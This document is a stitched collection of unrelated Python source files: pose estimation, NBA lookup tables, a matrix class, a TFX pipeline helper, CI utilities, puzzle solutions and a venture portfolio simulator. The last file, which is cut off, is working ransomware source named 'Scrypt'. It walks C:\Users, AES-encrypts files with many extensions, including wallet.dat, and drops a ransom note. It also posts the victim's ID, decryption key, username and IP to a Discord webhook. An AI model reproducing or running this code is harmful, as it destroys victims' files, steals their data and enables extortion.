dummy1 = np.array([x1,y1])
flyarea_corners[3] = dummy1
fa_p1 = flyarea_corners[0]
fa_p2 = flyarea_corners[1]
fa_p3 = flyarea_corners[2]
fa_p4 = flyarea_corners[3]
cv2.line(img,(fa_p1[0],fa_p1[1]),(fa_p2[0],fa_p2[1]), (0,0,255),line_point)
cv2.line(img,(fa_p2[0],fa_p2[1]),(fa_p3[0],fa_p3[1]), (0,0,255),line_point)
cv2.line(img,(fa_p4[0],fa_p4[1]),(fa_p1[0],fa_p1[1]), (0,0,255),line_point)
cv2.line(img,(fa_p3[0],fa_p3[1]),(fa_p4[0],fa_p4[1]), (0,0,255),line_point)
"""
############################################################
# PREDICT FLYABLE AREA BASED ON ESTIMATED POSE
############################################################
offset = 0.0 # flyable area corners are at an offset from outermost corners
y = min_y # and they are over a plane
p1 = np.array([[min_x+offset],[y],[min_z+offset]])
p2 = np.array([[min_x+offset],[y],[max_z-offset]])
p3 = np.array([[max_x-offset],[y],[min_z+offset]])
p4 = np.array([[max_x-offset],[y],[max_z-offset]])
# These are 4 points defining the square of the flyable area
flyarea_3Dpoints = np.concatenate((p1,p2,p3,p4), axis = 1)
flyarea_3Dpoints = np.concatenate((flyarea_3Dpoints, np.ones((1,4))), axis = 0)
print("Gate Flyable Area 3D:\n{}".format(flyarea_3Dpoints))
# get transform
Rt_pr = np.concatenate((R_pr, t_pr), axis=1)
flyarea_2Dpoints = compute_projection(flyarea_3Dpoints, Rt_pr, internal_calibration)
print("Gate Flyable Area 2D projection:\n{}".format(flyarea_2Dpoints))
for i,(x,y) in enumerate(flyarea_2Dpoints.T):
col1 = 0#np.random.randint(0,256)
col2 = 0#np.random.randint(0,256)
col3 = 255#np.random.randint(0,256)
cv2.circle(img, (x,y), 3, (col1,col2,col3), -1)
cv2.putText(img, str(i), (int(x) + 5, int(y) + 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (col1, col2, col3), 1)
p1_2d = np.array([ flyarea_2Dpoints[0][0], flyarea_2Dpoints[1][0]])
p2_2d = np.array([ flyarea_2Dpoints[0][1], flyarea_2Dpoints[1][1]])
p3_2d = np.array([ flyarea_2Dpoints[0][2], flyarea_2Dpoints[1][2]])
p4_2d = np.array([ flyarea_2Dpoints[0][3], flyarea_2Dpoints[1][3]])
"""
# Show the image and wait key press
cv2.imshow(wname, img)
cv2.waitKey()
print("Rotation: {}".format(R_pr))
print("Translation: {}".format(t_pr))
print(" Predict time: {}".format(t2 - t1))
print(" 2D Points extraction time: {}".format(t3- t2))
print(" Pose calculation time: {}:".format(t4 - t3))
print(" Total time: {}".format(t4-t1))
print("Press any key to close.")
if __name__ == '__main__':
import sys
if (len(sys.argv) == 5):
datacfg_file = sys.argv[1] # data file
cfgfile_file = sys.argv[2] # yolo network file
weightfile_file = sys.argv[3] # weightd file
imgfile_file = sys.argv[4] # image file
test(datacfg_file, cfgfile_file, weightfile_file, imgfile_file)
else:
print('Usage:')
print(' python valid.py datacfg cfgfile weightfile imagefile') | 23,588 | 10,146 |
team_abbr_lookup = {
"Toronto Raptors": "TOR",
"Brooklyn Nets": "BRK",
"New York Knicks": "NYK",
"Boston Celtics": "BOS",
"Philadelphia 76ers": "PHI",
"Indiana Pacers": "IND",
"Chicago Bulls": "CHI",
"Cleveland Cavaliers": "CLE",
"Detroit Pistons": "DET",
"Milwaukee Bucks": "MIL",
"Miami Heat": "MIA",
"Washington Wizards": "WAS",
"Charlotte Bobcats": "CHA",
"Charlotte Hornets": "CHA",
"Atlanta Hawks": "ATL",
"Orlando Magic": "ORL",
"Oklahoma City Thunder": "OKC",
"Portland Trail Blazers": "POR",
"Minnesota Timberwolves": "MIN",
"Denver Nuggets": "DEN",
"Utah Jazz": "UTA",
"Los Angeles Clippers": "LAC",
"Golden State Warriors": "GSW",
"Phoenix Suns": "PHO",
"Sacramento Kings": "SAC",
"Los Angeles Lakers": "LAL",
"San Antonio Spurs": "SAS",
"Houston Rockets": "HOU",
"Memphis Grizzlies": "MEM",
"Dallas Mavericks": "DAL",
"New Orleans Pelicans": "NOP"
}
abbr_team_lookup = {
"TOR": "Toronto Raptors",
"BRK": "Brooklyn Nets",
"NYK": "New York Knicks",
"BOS": "Boston Celtics",
"PHI": "Philadelphia 76ers",
"IND": "Indiana Pacers",
"CHI": "Chicago Bulls",
"CLE": "Cleveland Cavaliers",
"DET": "Detroit Pistons",
"MIL": "Milwaukee Bucks",
"MIA": "Miami Heat",
"WAS": "Washington Wizards",
"CHA": "Charlotte Hornets",
"ATL": "Atlanta Hawks",
"ORL": "Orlando Magic",
"OKC": "Oklahoma City Thunder",
"POR": "Portland Trail Blazers",
"MIN": "Minnesota Timberwolves",
"DEN": "Denver Nuggets",
"UTA": "Utah Jazz",
"LAC": "Los Angeles Clippers",
"GSW": "Golden State Warriors",
"PHO": "Phoenix Suns",
"SAC": "Sacramento Kings",
"LAL": "Los Angeles Lakers",
"SAS": "San Antonio Spurs",
"HOU": "Houston Rockets",
"MEM": "Memphis Grizzlies",
"DAL": "Dallas Mavericks",
"NOP": "New Orleans Pelicans"
}
oddsshark_team_id_lookup = {
"Toronto Raptors": 20742,
"Brooklyn Nets": 20749,
"New York Knicks": 20747,
"Boston Celtics": 20722,
"Philadelphia 76ers": 20731,
"Indiana Pacers": 20737,
"Chicago Bulls": 20732,
"Cleveland Cavaliers": 20735,
"Detroit Pistons": 20743,
"Milwaukee Bucks": 20725,
"Miami Heat": 20726,
"Washington Wizards": 20746,
"Charlotte Bobcats": 20751,
"Atlanta Hawks": 20734,
"Orlando Magic": 20750,
"Oklahoma City Thunder": 20728,
"Portland Trail Blazers": 20748,
"Minnesota Timberwolves": 20744,
"Denver Nuggets": 20723,
"Utah Jazz": 20738,
"Los Angeles Clippers": 20736,
"Golden State Warriors": 20741,
"Phoenix Suns": 20730,
"Sacramento Kings": 20745,
"Los Angeles Lakers": 20739,
"San Antonio Spurs": 20724,
"Houston Rockets": 20740,
"Memphis Grizzlies": 20729,
"Dallas Mavericks": 20727,
"New Orleans Pelicans": 20733
}
oddsshark_city_lookup = {
"Toronto": "Toronto Raptors",
"Brooklyn": "Brooklyn Nets",
"New York": "New York Knicks",
"Boston": "Boston Celtics",
"Philadelphia": "Philadelphia 76ers",
"Indiana": "Indiana Pacers",
"Chicago": "Chicago Bulls",
"Cleveland": "Cleveland Cavaliers",
"Detroit": "Detroit Pistons",
"Milwaukee": "Milwaukee Bucks",
"Miami": "Miami Heat",
"Washington": "Washington Wizards",
"Charlotte": "Charlotte Hornets",
"Atlanta": "Atlanta Hawks",
"Orlando": "Orlando Magic",
"Oklahoma City": "Oklahoma City Thunder",
"Portland": "Portland Trail Blazers",
"Minnesota": "Minnesota Timberwolves",
"Denver": "Denver Nuggets",
"Utah": "Utah Jazz",
"LA Clippers": "Los Angeles Clippers",
"Golden State": "Golden State Warriors",
"Phoenix": "Phoenix Suns",
"Sacramento": "Sacramento Kings",
"LA Lakers": "Los Angeles Lakers",
"San Antonio": "San Antonio Spurs",
"Houston": "Houston Rockets",
"Memphis": "Memphis Grizzlies",
"Dallas": "Dallas Mavericks",
"New Orleans": "New Orleans Pelicans"
}
| 4,028 | 1,754 |
from flask import Flask, request
import redis
app = Flask(__name__)
rconn = redis.StrictRedis()
def keygen(key):
return "token:{key}".format(key=key)
@app.route('/api/register', methods=["POST"])
def register_token():
userid = request.form['userid']
token = request.form['token']
rconn.set(keygen(userid), token)
| 335 | 118 |
import random
from collections import namedtuple
MatrixShape = namedtuple("MatrixShape", ["rows", "columns"])
def array2d(shape, value):
return [[value(i, j) for j in range(shape[1])] for i in range(shape[0])]
class Matrix:
def __init__(self, array):
self.array = array
rows = len(array)
columns = len(array[0])
for i in range(rows):
if len(array[i]) != columns:
raise ValueError(
"Matrix can not be created from ragged nested sequences"
)
self.shape = MatrixShape(rows, columns)
def __add__(self, other):
value = None
if isinstance(other, Matrix):
if self.shape != other.shape:
raise ValueError("Matrices must have the same shape")
value = lambda i, j: self[i][j] + other[i][j]
else:
value = lambda i, j: self[i][j] + other
return Matrix.build(self.shape, value)
def __eq__(self, other):
if not isinstance(other, Matrix):
return False
if self.shape != other.shape:
return False
rows, columns = self.shape
for i in range(rows):
for j in range(columns):
if self[i][j] != other[i][j]:
return False
return True
def __getitem__(self, row):
return self.array[row]
def __iter__(self):
for i in range(self.shape.rows):
for j in range(self.shape.columns):
yield self[i][j]
def __matmul__(self, other):
if self.shape.columns != other.shape.rows:
raise ValueError(
"The number of columns of the first matrix must be equal "
"to the number of rows of the second matrix!"
)
matrix = Matrix.zero((self.shape.rows, other.shape.columns))
for i in range(self.shape.rows):
for j in range(other.shape.columns):
matrix[i][j] = sum(
self[i][k] * other[k][j] for k in range(self.shape.columns)
)
return matrix
def __mul__(self, other):
value = None
if isinstance(other, Matrix):
if self.shape != other.shape:
raise ValueError("Matrices must have the same shape")
value = lambda i, j: self[i][j] * other[i][j]
else:
value = lambda i, j: self[i][j] * other
return Matrix.build(self.shape, value)
def __pow__(self, other):
return Matrix.build(self.shape, lambda i, j: self[i][j] ** other)
def __neg__(self):
return Matrix.build(self.shape, lambda i, j: -self[i][j])
def __radd__(self, other):
return self.__add__(other)
def __repr__(self):
buffer = []
for i in range(self.shape.rows):
body = ", ".join(str(j) for j in self[i])
preffix = " "
suffix = "" if i == self.shape.rows - 1 else ","
buffer.append(f"{preffix}[{body}]{suffix}")
return "Matrix([\n{}\n])".format("\n".join(buffer))
def __rmul__(self, other):
return self.__mul__(other)
def __rpow__(self, other):
return Matrix.build(self.shape, lambda i, j: other ** self[i][j])
def __rsub__(self, other):
return Matrix.build(self.shape, lambda i, j: other - self[i][j])
def __rtruediv__(self, other):
return Matrix.build(self.shape, lambda i, j: other / self[i][j])
def __sub__(self, other):
value = None
if isinstance(other, Matrix):
if self.shape != other.shape:
raise ValueError("Matrices must have the same shape")
value = lambda i, j: self[i][j] - other[i][j]
else:
value = lambda i, j: self[i][j] - other
return Matrix.build(self.shape, value)
def __truediv__(self, other):
value = None
if isinstance(other, Matrix):
if self.shape != other.shape:
raise ValueError("Matrices must have the same shape")
value = lambda i, j: self[i][j] / other[i][j]
else:
value = lambda i, j: self[i][j] / other
return Matrix.build(self.shape, value)
def reshape(self, shape):
source = iter(self)
return Matrix.build(shape, lambda i, j: next(source))
def transpose(self):
return Matrix.build(
(self.shape.columns, self.shape.rows),
lambda i, j: self[j][i]
)
@classmethod
def build(cls, shape, value):
return cls(array2d(shape, value))
@classmethod
def random(cls, shape):
return cls.build(shape, lambda i, j: random.random())
@classmethod
def zero(cls, shape):
return cls.build(shape, lambda i, j: 0)
| 4,832 | 1,460 |
import os.path
from typing import Any, Iterable, Mapping, Optional, Tuple
import tfx.v1 as tfx
from absl import logging
from ml_metadata.proto import metadata_store_pb2
from tfx.dsl.components.base.base_component import BaseComponent
from tfx.types.channel import Channel
from .base import BasePipelineHelper
from .interface import DEFAULT_CUSTOM_CONFIG, Resources
class LocalPipelineHelper(BasePipelineHelper, arbitrary_types_allowed=True):
model_push_destination: tfx.proto.PushDestination
def construct_trainer(
self,
*,
examples: Optional[Channel] = None,
transform_graph: Optional[Channel] = None,
schema: Optional[Channel] = None,
base_model: Optional[Channel] = None,
hyperparameters: Optional[Channel] = None,
run_fn: str,
train_args: Optional[tfx.proto.TrainArgs] = None,
eval_args: Optional[tfx.proto.EvalArgs] = None,
custom_config: Mapping[str, Any] = DEFAULT_CUSTOM_CONFIG,
) -> BaseComponent:
return tfx.components.Trainer(
examples=examples,
transform_graph=transform_graph,
schema=schema,
base_model=base_model,
hyperparameters=hyperparameters,
run_fn=run_fn,
train_args=train_args,
eval_args=eval_args,
custom_config=dict(custom_config),
)
def construct_tuner(
self,
*,
examples: Channel,
schema: Optional[Channel] = None,
transform_graph: Optional[Channel] = None,
base_model: Optional[Channel] = None,
tuner_fn: str,
train_args: Optional[tfx.proto.TrainArgs] = None,
eval_args: Optional[tfx.proto.EvalArgs] = None,
custom_config: Mapping[str, Any] = DEFAULT_CUSTOM_CONFIG,
) -> BaseComponent:
return tfx.components.Tuner(
examples=examples,
schema=schema,
transform_graph=transform_graph,
base_model=base_model,
tuner_fn=tuner_fn,
train_args=train_args,
eval_args=eval_args,
custom_config=dict(custom_config),
)
def construct_pusher(
self,
*,
model: Optional[Channel] = None,
model_blessing: Optional[Channel] = None,
infra_blessing: Optional[Channel] = None,
custom_config: Mapping[str, Any] = DEFAULT_CUSTOM_CONFIG,
) -> BaseComponent:
return tfx.components.Pusher(
model=model,
model_blessing=model_blessing,
infra_blessing=infra_blessing,
push_destination=self.model_push_destination,
custom_config=dict(custom_config),
)
def get_metadata_connection_config(self) -> metadata_store_pb2.ConnectionConfig:
metadata_path = os.path.join(
self.output_dir, "tfx_metadata", self.pipeline_name, "metadata.db"
)
logging.info("Pipeline will store metadata in %r", metadata_path)
return tfx.orchestration.metadata.sqlite_metadata_connection_config(
metadata_path
)
def create_and_run_pipeline(
self,
components: Iterable[BaseComponent],
enable_cache: bool = False,
) -> None:
logging.info(
"Creating local pipeline name=%r, root=%r, enable_cache=%r",
self.pipeline_name,
self.pipeline_root,
enable_cache,
)
metadata_connection_config = self.get_metadata_connection_config()
pipeline = tfx.dsl.Pipeline(
pipeline_name=self.pipeline_name,
pipeline_root=self.pipeline_root,
components=list(components),
enable_cache=enable_cache,
metadata_connection_config=metadata_connection_config,
)
logging.info("Runnig pipeline using local DAG runner")
tfx.orchestration.LocalDagRunner().run(pipeline)
logging.info("Pipeline run finished")
| 3,975 | 1,138 |
"""Useful utility functions for services."""
import logging
import re
from datetime import datetime, timezone
from inspect import Parameter, Signature
from dateutil.parser import parse
from humanize import naturaldelta, naturaltime
logger = logging.getLogger(__name__)
WORDS = {'1': 'one', '2': 'two', '3': 'three', '4': 'four', '5': 'five',
'6': 'six', '7': 'seven', '8': 'eight', '9': 'nine', '10': 'ten'}
NUMBERS = re.compile(r'\b([1-9]|10)\b')
class Outcome:
"""Possible outcomes for a CI build."""
WORKING = 'working'
PASSED = 'passed'
CANCELLED = 'cancelled'
FAILED = 'failed'
CRASHED = 'crashed'
def _numeric_words(text):
"""Replace numbers 1-10 with words.
Arguments:
text (:py:class:`str`): The text to replace numbers in.
Returns:
:py:class:`str`: The new text containing words.
"""
return NUMBERS.sub(lambda m: WORDS[m.group()], text)
def friendlier(func):
"""Replace numbers to make functions friendlier.
Arguments:
func: The function to wrap.
Returns:
A wrapper function applying :py:func:`_numeric_words`.
"""
def wrapper(*args, **kwargs):
"""Wrapper function to apply _numeric_words."""
result = func(*args, **kwargs)
try:
return _numeric_words(result)
except TypeError:
return result
return wrapper
naturaldelta = friendlier(naturaldelta) # pylint: disable=invalid-name
naturaltime = friendlier(naturaltime) # pylint: disable=invalid-name
def elapsed_time(start, end):
"""Calculate the elapsed time for a service activity.
Arguments:
start (:py:class:`str`): The activity start time.
end (:py:class:`str`): The activity end time.
Returns:
:py:class:`tuple`: The start and end times and humanized elapsed
time.
"""
start_time = safe_parse(start)
end_time = safe_parse(end)
if start_time is None or end_time is None:
logger.warning('failed to generate elapsed time')
text = 'elapsed time not available'
else:
text = 'took {}'.format(naturaldelta(parse(end) - parse(start)))
return to_utc_timestamp(start_time), to_utc_timestamp(end_time), text
def to_utc_timestamp(date_time):
"""Convert a naive or timezone-aware datetime to UTC timestamp.
Arguments:
date_time (:py:class:`datetime.datetime`): The datetime to
convert.
Returns:
:py:class:`int`: The timestamp (in seconds).
"""
if date_time is None:
return
if date_time.tzname() is None:
timestamp = date_time.replace(tzinfo=timezone.utc).timestamp()
else:
timestamp = date_time.timestamp()
return int(round(timestamp, 0))
def safe_parse(time):
"""Parse a string without throwing an error.
Arguments:
time (:py:class:`str`): The string to parse.
Returns:
:py:class:`datetime.datetime`: The parsed datetime.
"""
if time is None:
return
try:
return parse(time)
except (OverflowError, ValueError):
pass
def occurred(at_):
"""Calculate when a service event occurred.
Arguments:
at_ (:py:class:`str`): When the event occurred.
Returns:
:py:class:`str`: The humanized occurrence time.
"""
try:
occurred_at = parse(at_)
except (TypeError, ValueError):
logger.warning('failed to parse occurrence time %r', at_)
return 'time not available'
utc_now = datetime.now(tz=timezone.utc)
try:
return naturaltime((utc_now - occurred_at).total_seconds())
except TypeError: # at_ is a naive datetime
return naturaltime((datetime.now() - occurred_at).total_seconds())
def health_summary(builds):
"""Summarise the health of a project based on builds.
Arguments:
builds (:py:class:`list`): List of builds.
Returns:
:py:class:`str`: The health summary.
"""
for build in builds:
if build['outcome'] in {Outcome.PASSED}:
return 'ok'
elif build['outcome'] in {Outcome.CRASHED, Outcome.FAILED}:
return 'error'
else:
continue
return 'neutral'
def estimate_time(builds):
"""Update the working build with an estimated completion time.
Takes a simple average over the previous builds, using those
whose outcome is ``'passed'``.
Arguments:
builds (:py:class:`list`): All builds.
"""
try:
index, current = next(
(index, build) for index, build in enumerate(builds[:4])
if build['outcome'] == 'working'
)
except StopIteration:
return # no in-progress builds
if current.get('started_at') is None:
current['elapsed'] = 'estimate not available'
return
usable = [
current for current in builds[index + 1:]
if current['outcome'] == 'passed' and current['duration'] is not None
]
if not usable:
current['elapsed'] = 'estimate not available'
return
average_duration = int(sum(build['duration'] for build in usable) /
float(len(usable)))
finish = current['started_at'] + average_duration
remaining = (datetime.fromtimestamp(finish) -
datetime.now()).total_seconds()
if remaining >= 0:
current['elapsed'] = '{} left'.format(naturaldelta(remaining))
else:
current['elapsed'] = 'nearly done'
GITHUB_ISSUE = re.compile(r'''
(?: # one of:
fix(?:e(?:s|d))? # fix, fixes or fixed
| close(?:s|d)? # close, closes or closed
| resolve(?:s|d)? # resolve, resolves or resolved
)\s*(?:[^/]+/[^#]+)? # the account and repository name
\#\d+ # the issue number
''', re.IGNORECASE + re.VERBOSE)
"""Pattern for commit comment issue ID format, per `GitHub documentation`_.
.. _GitHub documentation: https://help.github.com/articles/closing-issues-via-commit-messages/
"""
TRACKER_STORY = re.compile(r'''
\[(?:
(?:
finish(?:e(?:s|d))? # finish, finishes or finished
| complete(?:s|d)? # complete, completes or completed
| fix(?:e(?:s|d))? # fix, fixes or fixed
)?
\s*\#\d+\s* # the story ID
)+\]
''', re.IGNORECASE + re.VERBOSE)
"""Pattern for commit hook story ID format, per `Tracker documentation`_.
.. _Tracker documentation: https://www.pivotaltracker.com/help/api/rest/v5#Source_Commits
"""
def remove_tags(commit_message):
"""Remove issue/tracker tags from a commit message.
Note:
Currently implemented for :py:class:`~.Tracker` and
:py:class:`~.GitHub` commit messages.
Arguments:
commit_message (:py:class:`str`): The commit message.
Returns:
:py:class:`str`: The message with tags removed.
"""
for remove in [GITHUB_ISSUE, TRACKER_STORY]:
commit_message = remove.sub('', commit_message)
return commit_message.strip()
def required_args(attrs):
"""Extract the required arguments from a class's attrs.
Arguments:
attrs (:py:class:`dict`) :The attributes of a class.
Returns:
:py:class:`set`: The required arguments.
"""
init_args = attr_args = set()
if '__init__' in attrs:
sig = Signature.from_callable(attrs['__init__'])
init_args = set(
name
for name, param in sig.parameters.items()
if param.kind == Parameter.KEYWORD_ONLY
and param.default is Signature.empty
)
if 'REQUIRED' in attrs:
attr_args = attrs['REQUIRED']
return set.union(attr_args, init_args)
def provided_args(attrs):
"""Extract the provided arguments from a class's attrs.
Arguments:
attrs (:py:class:`dict`) :The attributes of a class.
Returns:
:py:class:`set`: The provided arguments.
"""
return attrs.get('PROVIDED', set())
| 7,956 | 2,473 |
class Solution:
def trapRainWater(self, heightMap: List[List[int]]) -> int:
if not any(heightMap):
return 0
m, n = len(heightMap), len(heightMap[0])
pq = []
visited = set()
for j in range(n):
pq.append((heightMap[0][j], 0, j))
pq.append((heightMap[m - 1][j], m - 1, j))
visited.add((0, j))
visited.add((m - 1, j))
for i in range(1, m - 1):
pq.append((heightMap[i][0], i, 0))
pq.append((heightMap[i][n - 1], i, n - 1))
visited.add((i, 0))
visited.add((i, n - 1))
heapq.heapify(pq)
water = 0
while pq:
level, i, j = heapq.heappop(pq)
for ni, nj in (i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1):
if 0 <= ni < m and 0 <= nj < n and (ni, nj) not in visited:
visited.add((ni, nj))
water += max(level - heightMap[ni][nj], 0)
heapq.heappush(pq, (max(level, heightMap[ni][nj]), ni, nj))
return water
| 1,084 | 400 |
import utils
m = utils.opener.raw("input/16.txt")
rm, tm, om = m.split("\n\n")
rules = {}
for line in rm.split("\n"):
name, expr = line.split(": ")
rules[name] = [[int(q) for q in x.split("-")] for x in expr.split(" or ")]
myticket = [int(x) for x in tm.split("\n")[1].split(",")]
tickets = [[int(q) for q in x.split(",")] for x in tm.split("\n")[1:] + om.split("\n")[1:-1]]
s1 = 0
for t in tickets[:]:
for v in t:
if not any([r[0][0] <= v <= r[0][1] or r[1][0] <= v <= r[1][1] for r in rules.values()]):
s1 += v
tickets.remove(t)
print("1:", s1)
possible = {}
for rule in rules:
possible[rule] = set(range(len(myticket)))
for t in tickets:
for i, v in enumerate(t):
for rname, r in rules.items():
if not (r[0][0] <= v <= r[0][1] or r[1][0] <= v <= r[1][1]):
if i in possible[rname]:
possible[rname].remove(i)
found = {}
while possible:
k, v = min(possible.items(), key=lambda item: item[1])
found[k] = list(v)[0]
del possible[k]
for val in possible.values():
val.remove(found[k])
s2 = 1
for k, v in found.items():
if k.startswith("departure"):
s2 *= myticket[v]
print("2:", s2)
| 1,233 | 497 |
from collections import Counter
import random
import math
###
# Parameters of assumptions
###
# How many initial investments and avg check size
num_seed_rounds = 50
invested_per_seed_round = 0.5
# Probabilities of different outcomes (prob, outcome multiple)
outcome_probs_seed = [ [0.01, 100], # N% chance of Mx return
[0.03, 20],
[0.03, 10],
[0.03, 6],
[0.25, 1],
[0.65, 0]]
follow_on_pct = 0.5 # % of deals in which fund invests in next round
invested_per_follow_on = 1.0 # avg size of follow-on investment
outcome_probs_follow = [ [0.02, 30],
[0.06, 15],
[0.06, 8],
[0.06, 4],
[0.30, 1],
[0.50, 0]]
# number of simulated portfolios to generate
num_simulations = 10000
# constants
fund_size = (num_seed_rounds * invested_per_seed_round) +\
(num_seed_rounds * follow_on_pct * invested_per_follow_on)
###
# Classes
###
class Investment:
def __init__(self, amt_in, outcome, is_seed=True):
self.is_seed = is_seed
self.amt_in = amt_in
self.outcome = outcome
@property
def amt_out(self):
return (self.outcome * self.amt_in)
class Portfolio:
def __init__(self, investments):
self.investments = investments
@property
def total_invested(self):
return sum([i.amt_in for i in self.investments])
@property
def total_returned(self):
return sum([i.amt_out for i in self.investments])
@property
def return_multiple(self):
return ((self.total_returned*1.0) / self.total_invested)
def __str__(self):
l = ['invested: %s' % self.total_invested,
'returned: %s' % self.total_returned,
'return_multiple %s' % self.return_multiple,
'num_deals_total %s' % len(self.investments),
'num_deals_seed %s' % len([i for i in self.investments if i.is_seed]),
'num_deals_follow %s' % len([i for i in self.investments if not i.is_seed]),
]
return '%s' % l
###
# Funcs
##
def validate_params():
if (sum([x[0] for x in outcome_probs_seed]) != 1.0):
raise Exception("Seed probabilities don't add to 1! ")
if (sum([x[0] for x in outcome_probs_follow]) != 1.0):
raise Exception("Follow on probabilities don't add to 1! ")
def create_portfolio():
investments = []
# Seed rounds
for i in range(0, num_seed_rounds):
r = random.random()
prob_sum = 0
for (cur_prob, cur_outcome) in outcome_probs_seed:
prob_sum += cur_prob
if (r <= prob_sum):
investments.append(Investment(invested_per_seed_round, cur_outcome))
break
# Follow on
for i in range(0, num_seed_rounds):
if (random.random() > follow_on_pct):
continue # did not follow on
r = random.random() # for now, make them uncorrelated
prob_sum = 0
for (cur_prob, cur_outcome) in outcome_probs_follow:
prob_sum += cur_prob
if (r <= prob_sum):
investments.append(Investment(invested_per_follow_on, cur_outcome, is_seed=False))
return Portfolio(investments)
def run_simulations(num_iters):
portfolios = []
for i in range(0, num_iters):
cur_portfolio = create_portfolio()
portfolios.append(cur_portfolio)
# print a few, for debugging
print('Sample portfolios:')
for p in portfolios[0:10]:
print(' P: %s' % p)
print('# of portfolios with different multiple returns')
returns_counter = Counter([math.floor(p.return_multiple) for p in portfolios])
for (ret, cnt) in sorted(returns_counter.items()):
pct = 100 * ((cnt*1.0) / num_iters)
print(' %sx - %s (%0.0f%%)' % (ret, cnt, pct))
print('# of portfolios with different multiple returns (to 0.1x)')
returns_counter = Counter([round(p.return_multiple,1) for p in portfolios])
cum_pct = 0
for (ret, cnt) in sorted(returns_counter.items()):
pct = 100 * ((cnt*1.0) / num_iters)
cum_pct += pct
stars = '*' * int(pct*10)
print(' %sx - %s (%0.0f%%) (%0.0f%%) %s' % (ret, cnt, pct, cum_pct, stars))
###
# main()
###
if __name__ == "__main__":
# for dev
# random.seed(31331)
print('starting...')
print('validating params...')
validate_params()
print('Parameters')
print(' $%0.0fm fund which makes %s $%sm seed investments.' %\
( fund_size, num_seed_rounds, invested_per_seed_round))
print(' Follows on with $%sm, %s of the time.' % (invested_per_follow_on, follow_on_pct))
print('')
print('Running portfolio simluation...')
run_simulations(num_simulations)
print('done.')
| 4,931 | 1,750 |
import numpy as np
def dice_ratio(pred, label):
'''Note: pred & label should only contain 0 or 1.
'''
return np.sum(pred[label==1])*2.0 / (np.sum(pred) + np.sum(label)) | 186 | 71 |
import PyQt5
import PyQt5.QtWidgets
import PyQt5.QtCore
import sys
import requests
import random
import string
import threading
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import os
import shutil
btcAdd = ""
email = ""
discordWebhook = ""
fileTypes = ['.txt','.exe','.php','.pl','.7z','.rar','.m4a','.wma','.avi','.wmv','.csv','.d3dbsp','.sc2save','.sie','.sum','.ibank','.t13','.t12','.qdf','.gdb','.tax','.pkpass','.bc6','.bc7','.bkp','.qic','.bkf','.sidn','.sidd','.mddata','.itl','.itdb','.icxs','.hvpl','.hplg','.hkdb','.mdbackup','.syncdb','.gho','.cas','.svg','.map','.wmo','.itm','.sb','.fos','.mcgame','.vdf','.ztmp','.sis','.sid','.ncf','.menu','.layout','.dmp','.blob','.esm','.001','.vtf','.dazip','.fpk','.mlx','.kf','.iwd','.vpk','.tor','.psk','.rim','.w3x','.fsh','.ntl','.arch00','.lvl','.snx','.cfr','.ff','.vpp_pc','.lrf','.m2','.mcmeta','.vfs0','.mpqge','.kdb','.db0','.mp3','.upx','.rofl','.hkx','.bar','.upk','.das','.iwi','.litemod','.asset','.forge','.ltx','.bsa','.apk','.re4','.sav','.lbf','.slm','.bik','.epk','.rgss3a','.pak','.big','.unity3d','.wotreplay','.xxx','.desc','.py','.m3u','.flv','.js','.css','.rb','.png','.jpeg','.p7c','.p7b','.p12','.pfx','.pem','.crt','.cer','.der','.x3f','.srw','.pef','.ptx','.r3d','.rw2','.rwl','.raw','.raf','.orf','.nrw','.mrwref','.mef','.erf','.kdc','.dcr','.cr2','.crw','.bay','.sr2','.srf','.arw','.3fr','.dng','.jpeg','.jpg','.cdr','.indd','.ai','.eps','.pdf','.pdd','.psd','.dbfv','.mdf','.wb2','.rtf','.wpd','.dxg','.xf','.dwg','.pst','.accdb','.mdb','.pptm','.pptx','.ppt','.xlk','.xlsb','.xlsm','.xlsx','.xls','.wps','.docm','.docx','.doc','.odb','.odc','.odm','.odp','.ods','.odt','.sql','.zip','.tar','.tar.gz','.tgz','.biz','.ocx','.html','.htm','.3gp','.srt','.cpp','.mid','.mkv','.mov','.asf','.mpeg','.vob','.mpg','.fla','.swf','.wav','.qcow2','.vdi','.vmdk','.vmx','.gpg','.aes','.ARC','.PAQ','.tar.bz2','.tbk','.bak','.djv','.djvu','.bmp','.cgm','.tif','.tiff','.NEF','.cmd','.class','.jar','.java','.asp','.brd','.sch','.dch','.dip','.vbs','.asm','.pas','.ldf','.ibd','.MYI','.MYD','.frm','.dbf','.SQLITEDB','.SQLITE3','.asc','.lay6','.lay','.ms11(Securitycopy)','.sldm','.sldx','.ppsm','.ppsx','.ppam','.docb','.mml','.sxm','.otg','.slk','.xlw','.xlt','.xlm','.xlc','.dif','.stc','.sxc','.ots','.ods','.hwp','.dotm','.dotx','.docm','.DOT','.max','.xml','.uot','.stw','.sxw','.ott','.csr','.key','wallet.dat']
class Ransomware(PyQt5.QtCore.QRunnable):
def __init__(self):
super(Ransomware, self).__init__()
self.threadpool = PyQt5.QtCore.QThreadPool()
self.randomId = self.rID(12)
self.encryptionPass = self.rSeed(32)
self.filePath = "C:\\Users\\"
self.ip = ""
self.userName = ""
self.crypto = AES.new(self.encryptionPass.encode(), AES.MODE_ECB)
def readMe(self):
try:
f = open(f"C:\\Users\\{self.userName}\\Desktop\\readme.txt","w+")
f.write(note)
except:
pass
def getUserDetails(self):
try:
self.ip = requests.get("https://api.ipify.org?format=json").json()["ip"]
self.userName = os.getlogin()
except:
pass
def encryptFile(self, file):
try:
with open(file, 'rb') as infile:
content = self.crypto.encrypt(pad(infile.read(),32))
with open(file, "wb") as outfile:
outfile.write(content)
outfile.close()
except:
pass
def run(self):
self.sendMessage()
for root, directories, files in os.walk(self.filePath):
for filename in files:
filepath = os.path.join(root, filename)
for base in fileTypes:
if base in filepath:
threading.Thread(target=self.encryptFile, args=(filepath,)).start()
self.readMe()
def sendMessage(self):
try:
self.getUserDetails()
except:
pass
data = {
"embeds": [
{
"title": "**__Victim Report__:**",
"description": f"```css\nUSERID: {self.randomId}``` ```css\nKEY: {self.encryptionPass}``` ```css\nUSERNAME: {self.userName}``` ```css\nIP: {self.ip}```",
"color": 13959168,
"thumbnail": {
"url": "https://www.pngkit.com/png/full/168-1680567_69137579-pentagram-with-demon-baphomet-satanic-goat.png"
},
"author": {
"name": "Scrypt",
"icon_url": "https://i.imgur.com/F3j7z5K.png"
}
}
]
}
r = requests.post(discordWebhook, json=data)
def rSeed(self, stringLength):
password_characters = string.ascii_letters
